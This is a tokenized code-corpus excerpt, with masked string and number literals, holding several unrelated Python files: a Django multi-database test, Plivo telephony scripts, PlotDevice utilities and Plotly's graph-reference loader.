<NUM_LIT:0> , using = '<STR_LIT>' ) <EOL> self . assert_count ( self . model , <NUM_LIT:1> , using = '<STR_LIT>' ) <EOL> for key , value in self . kwargs . items ( ) : <EOL> self . assert_not_read ( self . model , ** { key : value } ) <EOL> for key , value in self . kwargs . items ( ) : <EOL> self . assert_read ( self . model , using = '<STR_LIT>' , ** { key : value } ) <EOL> try : <EOL> self . assert_update ( self . model , ** self . sgrawk ) <EOL> except AssertionError : <EOL> pass <EOL> else : <EOL> assert False , '<STR_LIT>' '<STR_LIT>' % self . model <EOL> self . assert_update ( self . model , using = '<STR_LIT>' , ** self . sgrawk ) <EOL> self . assert_not_read ( self . model , ** self . kwargs ) <EOL> self . assert_not_read ( self . model , using = '<STR_LIT>' , ** self . kwargs ) <EOL> self . assert_delete ( self . model ) <EOL> self . assert_delete ( self . model , using = '<STR_LIT>' ) <EOL> self . assert_count ( self . 
model , <NUM_LIT:0> ) <EOL> self . assert_count ( self . model , <NUM_LIT:0> , using = '<STR_LIT>' ) <EOL> def test_using_manager ( self ) : <EOL> self . assert_count ( self . manager , <NUM_LIT:0> ) <EOL> self . assert_create ( self . manager , ** self . kwargs ) <EOL> self . assert_not_count ( self . manager , <NUM_LIT:0> ) <EOL> self . assert_count ( self . manager , <NUM_LIT:1> ) <EOL> for key , value in self . kwargs . items ( ) : <EOL> self . assert_read ( self . manager , ** { key : value } ) <EOL> self . assert_update ( self . manager , ** self . sgrawk ) <EOL> self . assert_not_read ( self . manager , ** self . kwargs ) <EOL> self . assert_delete ( self . manager ) <EOL> self . assert_count ( self . manager , <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' </s>
<s> import plivohelper <EOL> import sys <EOL> try : <EOL> room = sys . argv [ <NUM_LIT:1> ] <EOL> fileformat = sys . argv [ <NUM_LIT:2> ] <EOL> filepath = sys . argv [ <NUM_LIT:3> ] <EOL> except IndexError : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> filename = sys . argv [ <NUM_LIT:4> ] <EOL> except IndexError : <EOL> filename = '<STR_LIT>' <EOL> REST_API_URL = '<STR_LIT>' <EOL> API_VERSION = '<STR_LIT>' <EOL> SID = '<STR_LIT>' <EOL> AUTH_TOKEN = '<STR_LIT>' <EOL> plivo = plivohelper . REST ( REST_API_URL , SID , AUTH_TOKEN , API_VERSION ) <EOL> call_params = { '<STR_LIT>' : room , '<STR_LIT>' : fileformat , '<STR_LIT>' : filepath , '<STR_LIT>' : filename } <EOL> try : <EOL> print plivo . conference_record_start ( call_params ) <EOL> except Exception , e : <EOL> print e </s>
<s> from flask import Flask , request , render_template <EOL> import plivohelper <EOL> import os <EOL> response_server = Flask ( "<STR_LIT>" ) <EOL> response_server . debug = True <EOL> @ response_server . errorhandler ( <NUM_LIT> ) <EOL> def page_not_found ( error ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> return '<STR_LIT>' , <NUM_LIT> <EOL> @ response_server . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def ringing ( ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT:OK>" <EOL> @ response_server . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def hangup ( ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT:OK>" <EOL> @ response_server . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def answered ( ) : <EOL> if request . method == '<STR_LIT:POST>' : <EOL> try : <EOL> print "<STR_LIT>" % request . form [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> else : <EOL> try : <EOL> print "<STR_LIT>" % request . args [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> r = plivohelper . Response ( ) <EOL> r . addHangup ( reason = "<STR_LIT>" ) <EOL> print "<STR_LIT>" % r <EOL> return render_template ( '<STR_LIT>' , response = r ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if not os . path . isfile ( "<STR_LIT>" ) : <EOL> print "<STR_LIT>" <EOL> else : <EOL> response_server . run ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) </s>
<s> import sys <EOL> from os . path import dirname , abspath , join <EOL> sys . path . append ( join ( dirname ( abspath ( __file__ ) ) , '<STR_LIT>' ) ) <EOL> import plotdevice . gui <EOL> import AppKit <EOL> from signal import signal , SIGINT <EOL> signal ( SIGINT , lambda m , n : AppKit . NSApplication . sharedApplication ( ) . terminate_ ( True ) ) <EOL> from PyObjCTools import AppHelper <EOL> AppHelper . runEventLoop ( ) </s>
<s> import os <EOL> import sys <EOL> import re <EOL> import json <EOL> import csv <EOL> from contextlib import contextmanager <EOL> from collections import OrderedDict , defaultdict <EOL> from os . path import abspath , dirname , exists , join , splitext <EOL> from random import choice , shuffle <EOL> from Foundation import NSAutoreleasePool <EOL> from plotdevice import DeviceError <EOL> from . readers import read , XMLParser <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def grid ( cols , rows , colSize = <NUM_LIT:1> , rowSize = <NUM_LIT:1> , shuffled = False ) : <EOL> """<STR_LIT>""" <EOL> rowRange = xrange ( int ( rows ) ) <EOL> colRange = xrange ( int ( cols ) ) <EOL> if ( shuffled ) : <EOL> rowRange = list ( rowRange ) <EOL> colRange = list ( colRange ) <EOL> shuffle ( rowRange ) <EOL> shuffle ( colRange ) <EOL> for y in rowRange : <EOL> for x in colRange : <EOL> yield ( x * colSize , y * rowSize ) <EOL> def random ( v1 = None , v2 = None , mean = None , sd = None ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> if v1 != None and v2 == None : <EOL> if isinstance ( v1 , float ) : <EOL> return random . random ( ) * v1 <EOL> else : <EOL> return int ( random . random ( ) * v1 ) <EOL> elif v1 != None and v2 != None : <EOL> if isinstance ( v1 , float ) or isinstance ( v2 , float ) : <EOL> start = min ( v1 , v2 ) <EOL> end = max ( v1 , v2 ) <EOL> return start + random . random ( ) * ( end - start ) <EOL> else : <EOL> start = min ( v1 , v2 ) <EOL> end = max ( v1 , v2 ) + <NUM_LIT:1> <EOL> return int ( start + random . random ( ) * ( end - start ) ) <EOL> elif mean != None and sd != None : <EOL> return random . normalvariate ( mean , sd ) <EOL> else : <EOL> return random . 
random ( ) <EOL> def files ( path = "<STR_LIT:*>" , case = True ) : <EOL> """<STR_LIT>""" <EOL> from iglob import iglob <EOL> if type ( path ) == unicode : <EOL> path . encode ( '<STR_LIT:utf-8>' ) <EOL> path = os . path . expanduser ( path ) <EOL> return list ( iglob ( path . decode ( '<STR_LIT:utf-8>' ) , case = case ) ) <EOL> def autotext ( sourceFile ) : <EOL> from plotdevice . util . kgp import KantGenerator <EOL> k = KantGenerator ( sourceFile ) <EOL> return k . output ( ) <EOL> def _as_sequence ( seq ) : <EOL> if not hasattr ( seq , '<STR_LIT>' ) : <EOL> badtype = '<STR_LIT>' % type ( seq ) <EOL> raise DeviceError ( badtype ) <EOL> return list ( seq ) <EOL> def _as_before ( orig , lst ) : <EOL> return "<STR_LIT>" . join ( lst ) if isinstance ( orig , basestring ) else list ( lst ) <EOL> def _getter ( seq , names ) : <EOL> from operator import itemgetter , attrgetter <EOL> is_dotted = any ( [ '<STR_LIT:.>' in name for name in names ] ) <EOL> getter = attrgetter if is_dotted or hasattr ( seq [ <NUM_LIT:0> ] , names [ <NUM_LIT:0> ] ) else itemgetter <EOL> return getter ( * names ) <EOL> def order ( seq , * names , ** kwargs ) : <EOL> lst = _as_sequence ( seq ) <EOL> if not names or not seq : <EOL> reordered = [ ( it , idx ) for idx , it in enumerate ( lst ) ] <EOL> else : <EOL> getter = _getter ( lst , names ) <EOL> reordered = [ ( getter ( it ) , idx ) for idx , it in enumerate ( lst ) ] <EOL> reordered . sort ( ** kwargs ) <EOL> return [ it [ <NUM_LIT:1> ] for it in reordered ] <EOL> def ordered ( seq , * names , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> lst = _as_sequence ( seq ) <EOL> if kwargs . 
get ( '<STR_LIT>' ) and lst : <EOL> return _as_before ( seq , [ lst [ idx ] for idx in kwargs [ '<STR_LIT>' ] ] ) <EOL> if not names or not lst : <EOL> return _as_before ( seq , sorted ( lst , ** kwargs ) ) <EOL> return _as_before ( seq , sorted ( lst , key = _getter ( lst , names ) , ** kwargs ) ) <EOL> def shuffled ( seq ) : <EOL> """<STR_LIT>""" <EOL> lst = _as_sequence ( seq ) <EOL> shuffle ( lst ) <EOL> return _as_before ( seq , lst ) <EOL> def _copy_attr ( v ) : <EOL> if v is None : <EOL> return None <EOL> elif hasattr ( v , "<STR_LIT>" ) : <EOL> return v . copy ( ) <EOL> elif isinstance ( v , tuple ) : <EOL> if hasattr ( v , '<STR_LIT>' ) : <EOL> return v . _replace ( ) <EOL> return tuple ( v ) <EOL> elif isinstance ( v , list ) : <EOL> return list ( v ) <EOL> elif isinstance ( v , ( int , str , unicode , float , bool , long ) ) : <EOL> return v <EOL> else : <EOL> raise DeviceError , "<STR_LIT>" % v <EOL> def _copy_attrs ( source , target , attrs ) : <EOL> for attr in attrs : <EOL> try : <EOL> setattr ( target , attr , _copy_attr ( getattr ( source , attr ) ) ) <EOL> except AttributeError , e : <EOL> print "<STR_LIT>" % attr , hasattr ( source , attr ) , hasattr ( target , attr ) <EOL> raise e <EOL> def _flatten ( seq ) : <EOL> return sum ( ( [ x ] if not isinstance ( x , ( list , tuple ) ) else list ( x ) for x in seq ) , [ ] ) <EOL> def trim_zeroes ( func ) : <EOL> return lambda slf : re . sub ( r'<STR_LIT>' , '<STR_LIT>' , func ( slf ) ) <EOL> def numlike ( obj ) : <EOL> return hasattr ( obj , '<STR_LIT>' ) or hasattr ( obj , '<STR_LIT>' ) <EOL> class BetterRepr ( object ) : <EOL> def __repr__ ( self , indent = <NUM_LIT:2> ) : <EOL> result = '<STR_LIT>' % self . __class__ . __name__ <EOL> for k , v in self . iteritems ( ) : <EOL> if isinstance ( v , BetterRepr ) : <EOL> vStr = v . __repr__ ( indent + <NUM_LIT:2> ) <EOL> else : <EOL> vStr = v . __repr__ ( ) <EOL> result += "<STR_LIT:\n>" + '<STR_LIT:U+0020>' * indent + k . 
__repr__ ( ) + '<STR_LIT>' + vStr <EOL> if not result . endswith ( '<STR_LIT:{>' ) : <EOL> result += "<STR_LIT:\n>" <EOL> result += '<STR_LIT:}>' <EOL> return result <EOL> class odict ( BetterRepr , OrderedDict ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ddict ( BetterRepr , defaultdict ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class adict ( BetterRepr , dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kw ) : <EOL> super ( adict , self ) . __init__ ( * args , ** kw ) <EOL> self . __initialised = True <EOL> def __getattr__ ( self , key ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError , k : <EOL> raise AttributeError , k <EOL> def __setattr__ ( self , key , value ) : <EOL> if not self . __dict__ . has_key ( '<STR_LIT>' ) : <EOL> return dict . __setattr__ ( self , key , value ) <EOL> self [ key ] = value <EOL> def __delattr__ ( self , key ) : <EOL> try : <EOL> del self [ key ] <EOL> except KeyError , k : <EOL> raise AttributeError , k <EOL> @ contextmanager <EOL> def autorelease ( ) : <EOL> pool = NSAutoreleasePool . alloc ( ) . init ( ) <EOL> yield <EOL> del pool <EOL> def rsrc_path ( resource = None ) : <EOL> """<STR_LIT>""" <EOL> module_root = abspath ( dirname ( dirname ( __file__ ) ) ) <EOL> rsrc_root = join ( module_root , '<STR_LIT>' ) <EOL> if not exists ( rsrc_root ) : <EOL> from glob import glob <EOL> for pth in glob ( join ( module_root , '<STR_LIT>' ) ) : <EOL> rsrc_root = abspath ( pth ) <EOL> break <EOL> else : <EOL> notfound = "<STR_LIT>" <EOL> raise RuntimeError ( notfound ) <EOL> if resource : <EOL> return join ( rsrc_root , resource ) <EOL> return rsrc_root </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import hashlib <EOL> import json <EOL> import os <EOL> import re <EOL> from pkg_resources import resource_string <EOL> import requests <EOL> import six <EOL> from plotly import files , utils <EOL> GRAPH_REFERENCE_PATH = '<STR_LIT>' <EOL> GRAPH_REFERENCE_DOWNLOAD_TIMEOUT = <NUM_LIT:5> <EOL> _BACKWARDS_COMPAT_CLASS_NAMES = { <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : list } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT:bar>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT:data>' , '<STR_LIT>' : list } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : None , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } <EOL> } <EOL> def get_graph_reference ( ) : <EOL> """<STR_LIT>""" <EOL> default_config = files . FILE_CONTENT [ files . CONFIG_FILE ] <EOL> if files . check_file_permissions ( ) : <EOL> graph_reference = utils . load_json_dict ( files . GRAPH_REFERENCE_FILE ) <EOL> config = utils . load_json_dict ( files . CONFIG_FILE ) <EOL> plotly_api_domain = config . 
get ( '<STR_LIT>' , <EOL> default_config [ '<STR_LIT>' ] ) <EOL> else : <EOL> graph_reference = { } <EOL> plotly_api_domain = default_config [ '<STR_LIT>' ] <EOL> sha1 = hashlib . sha1 ( six . b ( str ( graph_reference ) ) ) . hexdigest ( ) <EOL> graph_reference_url = '<STR_LIT>' . format ( plotly_api_domain , <EOL> GRAPH_REFERENCE_PATH , sha1 ) <EOL> try : <EOL> response = requests . get ( graph_reference_url , <EOL> timeout = GRAPH_REFERENCE_DOWNLOAD_TIMEOUT ) <EOL> response . raise_for_status ( ) <EOL> except requests . exceptions . RequestException : <EOL> if not graph_reference : <EOL> path = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> s = resource_string ( '<STR_LIT>' , path ) . decode ( '<STR_LIT:utf-8>' ) <EOL> graph_reference = json . loads ( s ) <EOL> else : <EOL> if six . PY3 : <EOL> content = str ( response . content , encoding = '<STR_LIT:utf-8>' ) <EOL> else : <EOL> content = response . content <EOL> data = json . loads ( content ) <EOL> if data [ '<STR_LIT>' ] : <EOL> graph_reference = data [ '<STR_LIT>' ] <EOL> return utils . decode_unicode ( graph_reference ) <EOL> def string_to_class_name ( string ) : <EOL> """<STR_LIT>""" <EOL> string = re . sub ( r'<STR_LIT>' , lambda m : m . group ( ) . title ( ) , string , count = <NUM_LIT:1> ) <EOL> string = re . sub ( r'<STR_LIT>' , lambda m : m . group ( ) [ <NUM_LIT:1> : ] . 
title ( ) , string ) <EOL> return str ( string ) <EOL> def object_name_to_class_name ( object_name ) : <EOL> """<STR_LIT>""" <EOL> if object_name in TRACE_NAMES : <EOL> return string_to_class_name ( object_name ) <EOL> if object_name in OBJECT_NAME_TO_CLASS_NAME : <EOL> return OBJECT_NAME_TO_CLASS_NAME [ object_name ] <EOL> if object_name in ARRAYS : <EOL> return '<STR_LIT:list>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def get_attributes_dicts ( object_name , parent_object_names = ( ) ) : <EOL> """<STR_LIT>""" <EOL> object_dict = OBJECTS [ object_name ] <EOL> additional_attributes = object_dict [ '<STR_LIT>' ] <EOL> attribute_paths = list ( object_dict [ '<STR_LIT>' ] ) <EOL> for parent_object_name in reversed ( parent_object_names ) : <EOL> if parent_object_name in ARRAYS : <EOL> continue <EOL> parent_object_dict = OBJECTS [ parent_object_name ] <EOL> parent_attribute_paths = parent_object_dict [ '<STR_LIT>' ] <EOL> for path in list ( attribute_paths ) : <EOL> if not _is_valid_sub_path ( path , parent_attribute_paths ) : <EOL> attribute_paths . remove ( path ) <EOL> attributes_dicts = { path : utils . get_by_path ( GRAPH_REFERENCE , path ) <EOL> for path in attribute_paths } <EOL> attributes_dicts [ '<STR_LIT>' ] = additional_attributes <EOL> return attributes_dicts <EOL> def get_valid_attributes ( object_name , parent_object_names = ( ) ) : <EOL> attributes = get_attributes_dicts ( object_name , parent_object_names ) <EOL> valid_attributes = set ( ) <EOL> for attributes_dict in attributes . values ( ) : <EOL> for key , val in attributes_dict . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> valid_attributes . add ( key ) <EOL> deprecated_attributes = attributes_dict . get ( '<STR_LIT>' , { } ) <EOL> for key , val in deprecated_attributes . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> valid_attributes . 
add ( key ) <EOL> return valid_attributes <EOL> def get_deprecated_attributes ( object_name , parent_object_names = ( ) ) : <EOL> attributes = get_attributes_dicts ( object_name , parent_object_names ) <EOL> deprecated_attributes = set ( ) <EOL> for attributes_dict in attributes . values ( ) : <EOL> deprecated_attributes_dict = attributes_dict . get ( '<STR_LIT>' , { } ) <EOL> for key , val in deprecated_attributes_dict . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> deprecated_attributes . add ( key ) <EOL> return deprecated_attributes <EOL> def get_subplot_attributes ( object_name , parent_object_names = ( ) ) : <EOL> attributes = get_attributes_dicts ( object_name , parent_object_names ) <EOL> subplot_attributes = set ( ) <EOL> for attributes_dict in attributes . values ( ) : <EOL> for key , val in attributes_dict . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if isinstance ( val , dict ) and val . get ( '<STR_LIT>' ) : <EOL> subplot_attributes . add ( key ) <EOL> deprecated_attributes = attributes_dict . get ( '<STR_LIT>' , { } ) <EOL> for key , val in deprecated_attributes . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if isinstance ( val , dict ) and val . get ( '<STR_LIT>' ) : <EOL> subplot_attributes . add ( key ) <EOL> return subplot_attributes <EOL> def attribute_path_to_object_names ( attribute_container_path ) : <EOL> """<STR_LIT>""" <EOL> object_names = [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in attribute_container_path : <EOL> for path_part in attribute_container_path : <EOL> if path_part in OBJECTS : <EOL> object_names . append ( path_part ) <EOL> if path_part in ARRAYS : <EOL> object_names . append ( path_part ) <EOL> object_names . append ( path_part [ : - <NUM_LIT:1> ] ) <EOL> elif '<STR_LIT>' in attribute_container_path : <EOL> object_names . append ( '<STR_LIT>' ) <EOL> start_index = attribute_container_path . 
index ( '<STR_LIT>' ) <EOL> for path_part in attribute_container_path [ start_index : ] : <EOL> if path_part in OBJECTS : <EOL> object_names . append ( path_part ) <EOL> if path_part in ARRAYS : <EOL> object_names . append ( path_part ) <EOL> object_names . append ( path_part [ : - <NUM_LIT:1> ] ) <EOL> else : <EOL> object_names . append ( '<STR_LIT:data>' ) <EOL> for path_part in attribute_container_path : <EOL> if path_part in OBJECTS : <EOL> object_names . append ( path_part ) <EOL> if path_part in ARRAYS : <EOL> object_names . append ( path_part ) <EOL> object_names . append ( path_part [ : - <NUM_LIT:1> ] ) <EOL> return tuple ( object_names ) <EOL> def get_role ( object_name , attribute , value = None , parent_object_names = ( ) ) : <EOL> """<STR_LIT>""" <EOL> if object_name in TRACE_NAMES and attribute == '<STR_LIT:type>' : <EOL> return '<STR_LIT:info>' <EOL> attributes_dicts = get_attributes_dicts ( object_name , parent_object_names ) <EOL> matches = [ ] <EOL> for attributes_dict in attributes_dicts . values ( ) : <EOL> for key , val in attributes_dict . items ( ) : <EOL> if key == attribute : <EOL> matches . append ( val ) <EOL> for key , val in attributes_dict . get ( '<STR_LIT>' , { } ) . items ( ) : <EOL> if key == attribute : <EOL> matches . append ( val ) <EOL> roles = [ ] <EOL> for match in matches : <EOL> role = match [ '<STR_LIT>' ] <EOL> array_ok = match . get ( '<STR_LIT>' ) <EOL> if value is not None and array_ok : <EOL> iterable = hasattr ( value , '<STR_LIT>' ) <EOL> stringy = isinstance ( value , six . string_types ) <EOL> dicty = isinstance ( value , dict ) <EOL> if iterable and not stringy and not dicty : <EOL> role = '<STR_LIT:data>' <EOL> roles . 
append ( role ) <EOL> if '<STR_LIT:data>' in roles : <EOL> role = '<STR_LIT:data>' <EOL> else : <EOL> role = roles [ <NUM_LIT:0> ] <EOL> return role <EOL> def _is_valid_sub_path ( path , parent_paths ) : <EOL> """<STR_LIT>""" <EOL> if not parent_paths : <EOL> return True <EOL> for parent_path in parent_paths : <EOL> if path [ : len ( parent_path ) ] == parent_path : <EOL> return True <EOL> return False <EOL> def _get_objects ( ) : <EOL> """<STR_LIT>""" <EOL> objects = { } <EOL> for node , path in utils . node_generator ( GRAPH_REFERENCE ) : <EOL> if any ( [ key in path for key in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) : <EOL> continue <EOL> if node . get ( '<STR_LIT>' ) != '<STR_LIT:object>' : <EOL> continue <EOL> if '<STR_LIT>' in node : <EOL> continue <EOL> object_name = path [ - <NUM_LIT:1> ] <EOL> if object_name not in objects : <EOL> objects [ object_name ] = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { } } <EOL> if node . get ( '<STR_LIT>' ) : <EOL> objects [ object_name ] [ '<STR_LIT>' ] . append ( <EOL> path + ( '<STR_LIT>' , ) <EOL> ) <EOL> else : <EOL> objects [ object_name ] [ '<STR_LIT>' ] . append ( path ) <EOL> objects [ object_name ] [ '<STR_LIT>' ] . append ( path ) <EOL> return objects <EOL> def _patch_objects ( ) : <EOL> """<STR_LIT>""" <EOL> layout_attribute_paths = [ ] <EOL> for node , path in utils . node_generator ( GRAPH_REFERENCE ) : <EOL> if any ( [ key in path for key in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) : <EOL> continue <EOL> if path and path [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> layout_attribute_paths . 
append ( path ) <EOL> for trace_name in TRACE_NAMES : <EOL> OBJECTS [ trace_name ] = { <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , trace_name ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , trace_name , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> OBJECTS [ '<STR_LIT>' ] = { '<STR_LIT>' : [ ( '<STR_LIT>' , ) ] , <EOL> '<STR_LIT>' : layout_attribute_paths , <EOL> '<STR_LIT>' : { } } <EOL> figure_attributes = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:object>' } , <EOL> '<STR_LIT:data>' : { '<STR_LIT>' : '<STR_LIT:object>' , '<STR_LIT>' : True } } <EOL> OBJECTS [ '<STR_LIT>' ] = { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : figure_attributes } <EOL> def _get_arrays ( ) : <EOL> """<STR_LIT>""" <EOL> arrays = { } <EOL> for node , path in utils . node_generator ( GRAPH_REFERENCE ) : <EOL> if any ( [ key in path for key in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) : <EOL> continue <EOL> if node . get ( '<STR_LIT>' ) != '<STR_LIT:object>' : <EOL> continue <EOL> if '<STR_LIT>' not in node : <EOL> continue <EOL> object_name = path [ - <NUM_LIT:1> ] <EOL> if object_name not in arrays : <EOL> items = node [ '<STR_LIT>' ] <EOL> if isinstance ( items , dict ) : <EOL> item_names = list ( items . keys ( ) ) <EOL> else : <EOL> item_names = [ object_name [ : - <NUM_LIT:1> ] ] <EOL> arrays [ object_name ] = { '<STR_LIT>' : [ path ] , '<STR_LIT>' : item_names } <EOL> return arrays <EOL> def _patch_arrays ( ) : <EOL> """<STR_LIT>""" <EOL> ARRAYS [ '<STR_LIT:data>' ] = { '<STR_LIT>' : [ ( '<STR_LIT>' , ) ] , '<STR_LIT>' : list ( TRACE_NAMES ) } <EOL> def _get_classes ( ) : <EOL> """<STR_LIT>""" <EOL> classes = { } <EOL> for class_name , class_dict in _BACKWARDS_COMPAT_CLASS_NAMES . 
items ( ) : <EOL> object_name = class_dict [ '<STR_LIT:object_name>' ] <EOL> base_type = class_dict [ '<STR_LIT>' ] <EOL> if object_name in OBJECTS or object_name in ARRAYS : <EOL> classes [ class_name ] = { '<STR_LIT:object_name>' : object_name , <EOL> '<STR_LIT>' : base_type } <EOL> else : <EOL> classes [ class_name ] = { '<STR_LIT:object_name>' : None , '<STR_LIT>' : base_type } <EOL> for object_name in TRACE_NAMES : <EOL> class_name = string_to_class_name ( object_name ) <EOL> classes [ class_name ] = { '<STR_LIT:object_name>' : object_name , '<STR_LIT>' : dict } <EOL> return classes <EOL> GRAPH_REFERENCE = get_graph_reference ( ) <EOL> TRACE_NAMES = list ( GRAPH_REFERENCE [ '<STR_LIT>' ] . keys ( ) ) <EOL> OBJECTS = _get_objects ( ) <EOL> _patch_objects ( ) <EOL> ARRAYS = _get_arrays ( ) <EOL> _patch_arrays ( ) <EOL> CLASSES = _get_classes ( ) <EOL> OBJECT_NAME_TO_CLASS_NAME = { class_dict [ '<STR_LIT:object_name>' ] : class_name <EOL> for class_name , class_dict in CLASSES . items ( ) <EOL> if class_dict [ '<STR_LIT:object_name>' ] is not None } </s>
